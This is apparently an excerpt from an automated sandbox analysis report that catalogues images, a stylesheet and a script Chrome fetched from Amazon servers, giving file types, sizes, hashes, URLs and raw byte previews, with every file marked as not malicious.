                                                                                                                                                                                                                                                                      Preview:.....8Exif..II*.......i...........................U.............JFIF.............C............................................!!$$!!0///06666666666...C............................."......". ... .%%""%%//,//6666666666..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...+C..(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..7.6..._P...\v.|.i.....Wg.w..l...z.....J.6...?..wQ..~........P...T........JZ.(...(...(.....Z..:....:.....|.t..Cp.H#.pk......... ...F..G..7...s-...Ozsq.S}.*.Jp..J(.X..|,\.W..n.......c.^....5..1...1.}..t
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 218x200, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):6677
                                                                                                                                                                                                                                                                      Entropy (8bit):7.928041400684103
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:TLyuSkj/fopjoByb5W1cRFgIP0yFQQbeT+Kizvvm/CEnvNbic8v3k:nyLkj/8oIY1c8CGaE+LDmKEvNMv0
                                                                                                                                                                                                                                                                      MD5:B67176D9736FB8BDB5C9DD13A10E4806
                                                                                                                                                                                                                                                                      SHA1:CA00B5655EC5FD8034F1DE9A7265451668B0A935
                                                                                                                                                                                                                                                                      SHA-256:86413077F06423DE4CB690F69A32245634A386D586F0D17664EF39BD6622F949
                                                                                                                                                                                                                                                                      SHA-512:7975D6D31FEB8CD7BA73A3FB931D6EE58D14F41D5382CCBAB45604450C2F1BFAC6FA2BAE5F2BF41B053F05E84B18C85AA775EA297ADB17C9C627605C9C192E60
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..............................................................!..1..AQ."2aq..Br....#3CRSb..$.4....%D..........................................................?..R..R..R..R..R..R.+....O.p..q...:..@|......i]..<..g......l$Y.t.....r.v..c+M%.Z.^..../...n...Z$x..g;.....=@.M^../s.$>.{1..O.....N.iz<v~.y..3..yl..|.A.......G.A....}.@.t.#K.7}.c.f.:.G5p.^..U.P..2.vKp....Io...$..;.@..;^..f...&..]........pE.....?;.[.[.[....~...c.L<5......w..V......Q..c0.8`.$.z...[.z.l.V..$..gF.U... .A..(..(..(..(..(..(..(..(..(..F=......f..n...v!...ot_....W...f.D.;.>'u..r..~.?..V.......L.?....>..._...if...34.;.wf<...rX.I..;Ha^...'....r:...q.FGLz......w..Z....$.BG..w8Q...*.h.j.\j.;.y...b.../....@H...rE..*t...}bj.8;.....Pf/x<.....[.T.#E,.n&.V..Ph....>d....C....9>..q.C.../..|.g5..:.P..{XG..f?y.......q8..9.8.2..e...+.9.;.VR.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 145x116, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):3783
                                                                                                                                                                                                                                                                      Entropy (8bit):7.892597719362774
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:TgfIdu08P9yj70Rp8i+jxwJTDAJbeXaLrkerYVtI3DJURa:xdg8jq+t2X6b5rYVtsJURa
                                                                                                                                                                                                                                                                      MD5:479684630CACC4A318DB9991B11BE386
                                                                                                                                                                                                                                                                      SHA1:8A290D73EEBB2164B6CCDA03A05CE5F218AE8172
                                                                                                                                                                                                                                                                      SHA-256:537C0F8FFE5BB82F4F291B491DC57C5316EAD76088AC3DEF116B08957BF763E3
                                                                                                                                                                                                                                                                      SHA-512:702287AECFEEA7DB21AC5C6079C047D1AFB6F8FE6B5FC1BFBDE9E2296581B5CB8097C4D458FCDF9CC71DF2D27F3411819DE518D7C69C4794E6FC1D526B8CFA1F
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..............................................................!..1.2Qa"Aq.....Br..RSb...#3CDT.....Uc.....................................................!."A1.............?..-z....b..I.......j.$U..q..{..,.$.n.....U......z.@.#....*.....iy...."7pyS.uV.jn.^E-..p>F.Z#]B./...rv....Z...{....F..|G....*fF>5.6......r b...N...>..?..%*.EG...d..&A...i.g.....4$......I.......u_.....h*..W........u..j....b....H.j<.@.G*..E...)....~.u_Q..j..q....5....].W_.#/..;.$..fo....W._G!..P...X.>..I..7...r......-.x>..p*1.P..*...V......Sy....u......K.......^.......E.t......u.k.kz].....M..+..H.g.H.!..k.......!....].u.=............N...o..*.Tm.p).d...Ed$.....*...X'.....CR.98F+.$.}../;..v._%4.J.eP..%.....s..3.k=GJ...3'.;...Gj....[..n.{B..p@.Z............R.)....*.P.?..q.D%.z...R>.n{...Fd.....U.b.".8.N.@.S.v.E..B.b.x.>x.&.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 233x320, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):22269
                                                                                                                                                                                                                                                                      Entropy (8bit):7.966452149230955
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:DuFUW5LY+fIqxspk1KT7wF93YQiK7WOX8vIkyBXWKPuYcPUdOws4QRtag4LSeCL3:aLLKg1ckF9IQ5WIkGrWIO7hBn4SYBu
                                                                                                                                                                                                                                                                      MD5:22FC8EF74DCF0C331C8379AAF2EBAF1B
                                                                                                                                                                                                                                                                      SHA1:09C700B70F945C01ACC8A0CB30D9ED32F9EEBC4B
                                                                                                                                                                                                                                                                      SHA-256:A9A41455C3718C1639264909F223AC170F76883938937C370D034C80270A3FA1
                                                                                                                                                                                                                                                                      SHA-512:EB7E7F92425BEDBC494C4A12DF3BE328E61C4ED0EFD49EBB03C58B2727CFC8CEB3D3675B7F5E5F09321BB2EDF5FDA5EA02306471E0CA00A5A9CC3999F6BE9BA2
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/71GjIV309kL._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........4...................................................................iu.#P/.y....3#}..8..D......>..#.A......<...\N.&._m .\B..Z....M..n...|.I..L6V.c$K....>.1.o.N.a.b...5..!!.|r$......d...../....T.E.q0..k..\ju.X.Y..'....F...]q..1GM~S....-_O.w.....D ....2...9f....3.?CO...nh#.X..m..u.ci$x...^....`....p..........]....m.)..o........V..`........<..6.......s...up..6.f.......3..z.U..s.|.kf..^.......<.......G.V....a.mY@.4.]Y..(.e.Z.jdUm......D...S.<....L^....D.....eJ.i..I[..2%.....t..r..........tk...k....].eu...W.6.....;..z......j..o.Y.NQlJ,.47.f...".[7`..B;@..d,..i..ru.....^f_.......).^....PK../..#..F:>l.*.!.e.I+..H.ip_.,Y...m.,.d...q.gM...u.&*%......@..a...z[.:^..Vj...P.S..\d........;...i.ZEik..-.....Ps8/Ws.,{./.G:.L.N[.I.a.j'......c...j.....@........>p.-"........~.V.X..x......
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 283x320, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):24853
                                                                                                                                                                                                                                                                      Entropy (8bit):7.97698963780309
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:k25GkBcMcCqsQpHuGd2W8LWssW0+Js9oLNs05hNN52oXHivd03y+pMgwvSsJaPi:xgMlItuBWsswJsaFNNXASC+lsJaa
                                                                                                                                                                                                                                                                      MD5:187E83A33B0B7E6DAB7331674A957F5A
                                                                                                                                                                                                                                                                      SHA1:675F76266E051722CC8810F54F6B0DDBA44AA89D
                                                                                                                                                                                                                                                                      SHA-256:007B2D5A7D30500B0C1DA3CF1C07B3E85233D3370B90E1DADE452BA8249CC38B
                                                                                                                                                                                                                                                                      SHA-512:B3E864B7ADEBBCE702045C0821818D279C753CC9A3AAF76A06DA51FC9BEB65FC9A8D674A625A37A7D0C6CEDB926B32AA83754EA90557EAA0E381E0403DDE97EB
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/71oeOVwPQ-L._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........6...................................................................erau9w(.\..wqF..o.C.T...&.o.CS.o.(.;...$*...{...F...[k..Z.uU=.lS+ ...X<.l.=y.U......ur......Yc......`.."...:@...3U..l.*.#..-.~z=dk.)L.7a....4.._.}.....=|=.=<....X.z.J..z..%.R_.;.=.....Y.%..]....y.\..*.k.....P~...[......./zya`W.$F...#V...K.K.K........h.....}....Uz.K]...I.....^kC.T....T.V.5..|..s.......j\Os...........'..r..9.~....S.K..Bs.De8.AS..8....e.U..l%6F>.b.:'...is=j.h...v..+7\N@..QD...x..i...H...U45-.zc.]..}K=h..*..cC....y]...}....7..|.d$.4.#...^x.8..E.....2lJ...hZn...@%O.=k.^.~_..C..8p.T.>.57.0.m.*...^......./!Q.aw....g...cs.u...G....$.n...>.{...L...sh(.J.t.....L[....!.=.9.|.U}5...w9.a..;.....@+..D..._n.d...+S...d[/3f..$m.>.5..{.G&.N.-...@..4....I.ar..<."...t@.J..Z#rr.'3...'..]yE<.|......qF.d.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1994)
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):3857
                                                                                                                                                                                                                                                                      Entropy (8bit):5.025490419210117
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:ZOW9K93Ye93YXOV8OV693YmOVgOV693YGOPOrODz93YkODz93Y/OWODz93YoU9mv:ZOWQNYeNYXOV8OV6NYmOVgOV6NYGOPOh
                                                                                                                                                                                                                                                                      MD5:452573B61BB54B9BC9C20711D3FA16B6
                                                                                                                                                                                                                                                                      SHA1:D9516AA0B3156D6855811752D72ED68DED139032
                                                                                                                                                                                                                                                                      SHA-256:0089ED3D5EB3F9604490C5811BDBB15731227E0F8010FB64B21FD94425C9E6DE
                                                                                                                                                                                                                                                                      SHA-512:741541BC26D457BAE82A7B428EC16075F1030679C47ED9E76A70028DAE7AFDFDFB6F88D2580CB4C71332045F7352B26EA35B00CFB9DBA57967993476F446BD13
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/I/11oFnIMXIiL.css?xcp
                                                                                                                                                                                                                                                                      Preview:._cropped-image-map_style_cropped-image-map__3oVAB{height:600px}._cropped-image-map_style_fluid-image-map-container__3GBMh{height:100%;overflow:hidden;position:relative;width:100%}._cropped-image-map_style_fluid-image-map-container__3GBMh ._cropped-image-map_style_image-map__12oiu{height:100%;left:-9999px;margin:auto;max-width:none;position:absolute;right:-9999px;width:1500px}._cropped-image-map_style_fluid-image-map-container__3GBMh ._cropped-image-map_style_image-map__12oiu img{height:100%}@media (max-width:767px){._cropped-image-map_style_cropped-image-map__3oVAB._cropped-image-map_style_tablet-app__2ZlzA{height:368px}._cropped-image-map_style_cropped-image-map__3oVAB._cropped-image-map_style_tablet-app__2ZlzA ._cropped-image-map_style_fluid-image-map-container__3GBMh ._cropped-image-map_style_image-map__12oiu{width:919px}}@media (min-width:768px) and (max-width:919px){._cropped-image-map_style_cropped-image-map__3oVAB._cropped-image-map_style_tablet-app__2ZlzA{height:470px}._croppe
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x200, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):11120
                                                                                                                                                                                                                                                                      Entropy (8bit):7.962642107553172
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:0yvFQ7o6Yh3e9491agGy0fjuMREv/AoZAtOZDHLZvah6d6l5v4FDDFHbXXqEhJ:0yvFQlYhd1ag7WK2Ev/vCIZrZv16l5QZ
                                                                                                                                                                                                                                                                      MD5:75832C9965DEE0F44E31F86F22E90417
                                                                                                                                                                                                                                                                      SHA1:6BB83CBCD6574FF8363EAEBE99CC6E5BCD582993
                                                                                                                                                                                                                                                                      SHA-256:A762D1EBECF60CA7664ADC978C57C533173D616DD9056CE78274F2C1EDB6B9E7
                                                                                                                                                                                                                                                                      SHA-512:243EF43C0E23287CF78C88753907FC4A05A8976B1E0E7DCDF8756A80BE7E7C0D3003C5A5172EA60D5071EECEF92DA265880C2F36C5607BB558188FC67188DB33
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/71PpuvUNQ4L._AC_SY200_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..............................................................!.1."A.2Qa.q...#BRt...$DSbr......3CT.......%d.....................................................!.1..a"AQ....#q..23BRr...C...............?..(.....*I.(.....*I.(.....5.z.J].1B?.".N.?mZ.....-..3...aI..W.....-..)tV.MkC]..o..b.7.'qZ..d(.[...(.*.u.T/NZ.G....p..B..~,xE^.........h}I...q...}.R.Cm...Q....wsV?l.....D..o....{3HR_..4..tm........79.P....q..%.hv.Q..v{.....z....won.}..wx...d#...\..].j0jv.....).Y..C..8#. .\.?@.B.8........]..d.C.....o.6..$...n.3~.B..4QE3...QRHQE.$.....=..W/.8.[.!G...51.=...io,.6.)......Oh.......'.*TW8j.....!X...._.8_.iM.5........0./....>....t..7.b.=O?..N..z.J.r.."...q.._z........X.?.O.>.(jI.{9.......D.O..`.q.h}...a.K.._G........5.O....5..h...4...-NP~.o.......b..u~...I$.F6.T}.#...5G:>.4.q..:|.H.e\8...CrW...).".e.y
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 440x400, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):35335
                                                                                                                                                                                                                                                                      Entropy (8bit):7.936077534796024
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:8glknIO4/X4EWgiG5+8RtelXMzI96t01v1sDYeVz7k:5lWIO4gtg7/el8JQ6Dnk
                                                                                                                                                                                                                                                                      MD5:8164DE4A431D48FC354F239FD03EF8C6
                                                                                                                                                                                                                                                                      SHA1:850544F7AB25F4EBAED205A5FFE6BDB0B01CF2B1
                                                                                                                                                                                                                                                                      SHA-256:4741A23A639C7BCEDDE0E51EEA75D271AA9E0DCB4E1EEB2B01B6F827ABB04290
                                                                                                                                                                                                                                                                      SHA-512:D1EA9006F00618A8453D9235035F5294607DF0BFE62BCD96F97620FBC4182588F1C6996393444E6B21853C68A64C7EE8303DD306421E07C2398B6664E95E537B
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/rbs_ohl_outdoors_silver/xcm_banners_mena_440x400_coop_6col_phl-spear_-_jackson_440x400_ae-en.jpg
                                                                                                                                                                                                                                                                      Preview:.....C....................................................................C............................................................................"...........................................C.............................!...1."AQ.aq.#2....$3...B..&6C.Yb.....................................=.........................!1..A"Q.2aq.#..BR..34r......Cb.T..............?...1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc.....]vn.o....kl.%;?2......E.P.u...VA.F..Y....9Y4.e.WR=..UUh.Ye..]u.,...*"(,..*.$..2l||...1q(.++&.........j..).^...Z.g..UT..s....j.^kqw.\.U..4.U...tWl\...v.{.vO...Wq....fq..j.....~................dz..WFR..... .erq.p./..../..(....2q.[M.Z.m7V.....( ..1.H#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#..D..?...P..0.....\D..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 285x200, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):8502
                                                                                                                                                                                                                                                                      Entropy (8bit):7.910850923808943
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:XWbG/URbjD9UIdlCFSvuzuVQpFfTDajL6fylcfSPYa0Rjdl:WG/U5xUOCgvV6DLVKlcMT0j3
                                                                                                                                                                                                                                                                      MD5:1548D34F6CA5DEBD6DACC991DFC7D29B
                                                                                                                                                                                                                                                                      SHA1:0F954DD0D838915FD45B2A7024EA1AD8D77E16CD
                                                                                                                                                                                                                                                                      SHA-256:97BB3C0774826C295A17213CC5D4A97B1D8769D020767AE6C5298FD2F6E8F803
                                                                                                                                                                                                                                                                      SHA-512:24C99B681D15222EAA326CED3ECFCC64B7C8E848CB231569A07CB21BC9FB8901EE187F48DECA090A93F0918826A47100A95379B26F39447476B432DF6A241C01
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/61lJW9LVKqL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........3................................................................`..]&t.NK.n...Ho..63.....,.LA.L..........O..%..3...7./N.z..u...sw.%.....ME..-...H.d.U..7G..r.1<.21..C#.L.|31...4........zB.K8.uf.GH.....Fd.L..8..f.....a.e%.:?5..........zy...?2.....^n...+.,.....sP..h..U..?..9l.;FX..nQi.S|c.....q~..^..$-.*....d...K.p..K.......f..I...v@9...C6...SQ.#..j.....H..^.2...m.HN6xV+..dIS1K.D.B..k...D.(&?......,.5.=.....bi."..Ov-MX0Y p....H@.l.,.a......e.>n......4v<...)#.(..}.j.~u...#.6b...=..).'..j}...Y.&b....)b ...H0X.l.Q.1..?.Y>...=....Q........3F.AD..2F..3...l..)b_H.x.o......X.Y......2...R...G..R'..-mc.oM..'m.?lz.2@}.k..I..1m.k<.v..VE..,F.............V.*W..-.E..6..B&@.U..T...1k.K...f..?H..................T../.}.h....i'#.$.....f...%2g..*.(Wt....%1.y4..z............&:.7.@.....].r.IBIY9..U...8
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (24182), with no line terminators
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):24182
                                                                                                                                                                                                                                                                      Entropy (8bit):5.315032386425423
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:Tvn/4G//y4q6IDB5yqO7RH3+o1EXt/CHoOP28BOzJjTbhYcG9LN1VV1XrLcMu3i1:T3XxL1awZgzJbhTGtZcMLzZ6gD23Uj
                                                                                                                                                                                                                                                                      MD5:1D6DBC0AA536245BD1B35B964F94E01A
                                                                                                                                                                                                                                                                      SHA1:A428BBA0D959C3D78F7DFE6307C5EDE5F1D8AA54
                                                                                                                                                                                                                                                                      SHA-256:38D0C94882C0FA40B0030F9564BAE92D902F657DFB954CFA6B53B1BFA083ECFE
                                                                                                                                                                                                                                                                      SHA-512:10E0D7982B54660203A46C5DF1B3DAB2C6EE6E379BE9903B11DDAA3ADA92DA355FC8C182B9D742AC5F4DBC71812891798D3F28028746D820A16016A1073E60F5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/41Qtra7lf+L.js
                                                                                                                                                                                                                                                                      Preview:var Creative=function(t){var e={};function n(r){if(e[r])return e[r].exports;var o=e[r]={i:r,l:!1,exports:{}};return t[r].call(o.exports,o,o.exports,n),o.l=!0,o.exports}return n.m=t,n.c=e,n.d=function(t,e,r){n.o(t,e)||Object.defineProperty(t,e,{configurable:!1,enumerable:!0,get:r})},n.r=function(t){Object.defineProperty(t,"__esModule",{value:!0})},n.n=function(t){var e=t&&t.__esModule?function(){return t.default}:function(){return t};return n.d(e,"a",e),e},n.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},n.p="",n(n.s=77)}([function(t,e,n){"use strict";n.r(e);var r="undefined"!=typeof MSFClient&&MSFClient;e.default=r},function(t,e,n){"use strict";var r=n(0),o="undefined"!=typeof navigator&&navigator,i=r.default&&r.default.getUserAgentInfo()||o&&o.userAgent;e.a=i},function(t,e,n){"use strict";n.r(e);var r=n(0),o=n(7),i=function(){if(r.default){var t=r.default.getDocumentCookie();return/\"av\":\"([.\d]*)\"/i.test(Object(o.a)(t,"amzn-app-ctxt"))}return!1}();e.default=i},f
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:PNG image data, 1 x 1, 8-bit gray+alpha, non-interlaced
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):68
                                                                                                                                                                                                                                                                      Entropy (8bit):4.241114311932129
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:yionv//thPlE+tJ8/V+/C/5lO1+dp:6v/lhPfA/UP1+p
                                                                                                                                                                                                                                                                      MD5:91E42DB1C66C0B276ABF6234DC50B2EB
                                                                                                                                                                                                                                                                      SHA1:C1986AF3C26609B8B7D8933F99C51C1A89E9EA6B
                                                                                                                                                                                                                                                                      SHA-256:63EF318D96B5D0D0CEBA6E04A4E622B1158335CDC67C49E27839132C6F655058
                                                                                                                                                                                                                                                                      SHA-512:0B77019542FDB02F72C8407A379579BDE36E2FE3AF81B1C74553F1B5DF2590373BF7E6FF3FEFCBDAF0B9A2FCF9B1E57B30D24E29810F0CFAF9D51153415C89CE
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/G/01/d16g/kpw/transparent-1x1.png
                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR.....................IDATx.cd`......0../....IEND.B`.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 87a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):35
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9302005337813077
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:M3UWRtJlllHh/:klJ/
                                                                                                                                                                                                                                                                      MD5:EFC4EC590572EDBD9502C40266EAF56B
                                                                                                                                                                                                                                                                      SHA1:F4E5AA15E838464E0BDE9D43805B5A5F36EEF6E9
                                                                                                                                                                                                                                                                      SHA-256:2BB20425D644D2D75889D1192CC182282F2ED2EFA9C7B98CD6E0D70761DE5907
                                                                                                                                                                                                                                                                      SHA-512:490A7E2D5F4EF201625FF9ED34D15F2D88FDFFDF6B7048701F3866ED1131997C7A3A80238A2FA19D919F64D6788087931D2EAC53A06741AE65CBA7BB4B0163C2
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF87a.............,...........D..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):71
                                                                                                                                                                                                                                                                      Entropy (8bit):4.19644707821733
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:PouVIZxgRO5ZB1XbZ6iFi:haxUkZ3X96x
                                                                                                                                                                                                                                                                      MD5:6AAEF67381946BFC1DDACCA8CF7F6C36
                                                                                                                                                                                                                                                                      SHA1:E441BBA8B691AD0FFF0BCCB75974880018AB41D6
                                                                                                                                                                                                                                                                      SHA-256:73F8AE8C11DAA6AD905107970E55C3C64CD7133561E9E91E650AAB092BA7245E
                                                                                                                                                                                                                                                                      SHA-512:99039B90D4F3819EFB0A395D0DC810DEE1A56265D443D24D1C9BDF832EF9F95887E3C417253698A4F76EF176D0ACE6334905F4B7B4E6A8421D2F650B84255EC2
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      